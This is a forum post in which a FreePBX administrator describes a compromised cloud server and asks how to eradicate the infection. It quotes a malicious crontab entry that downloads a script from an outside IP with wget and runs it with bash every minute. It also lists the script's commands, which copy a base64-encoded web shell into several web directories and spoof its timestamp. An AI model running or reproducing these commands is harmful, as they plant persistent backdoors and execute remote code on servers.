So lately, I noticed an issue on my FPBX instances. I go to log into the GUI and manage whatever I am in there to manage. After I navigate around a few pages, I get the warning at the top of the page that a module has been tampered with and I need to run:
fwconsole ma refreshsignatures
I do that and it finds tampered files associated with Framework. It downloads and installs it and after I do a chown and reload, I refresh the page and it’s fine again. Then I log in after a few days, same process happens again. I recently performed all of the updates, which also updated the framework version, so I assumed it was a fix applied with that patch to address that issue. I didn’t think much of it but I may have stumbled onto a bigger issue. On one of the servers that I run FPBX (all cloud hosted), I ran a script monthly to compile call recordings into a tar file that I can download. I went to investigate why it hadn’t ran for last month, starting with the crontab I entered, and instead of seeing the script I entered in there, I saw this:
*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
Immediately my heart sank. This obviously is malicious but I’m not sure even how or where this was inserted! I looked at the script that’s copied and it copies base64 encoded data into a generic looking page (/var/www/html/admin/views/ajax.php) and then proceeds to copy this script into multiple different folders and files:
mkdir -p /var/www/html/digium_phones/
mkdir -p /var/www/html/rest_phones/
cp /var/www/html/admin/views/ajax.php /var/www/html/rest_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/modules/core/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/digium_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/js/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/ajax.php
touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php
The main problem I have is identifying this and stopping it completely. I removed it completely from the crontab, but after a few minutes, it’s added right back in. I’m not even sure how this happened, I felt like I had the firewall and SSH access tightly locked down. Any help to identify this and eradicate it would be greatly appreciated!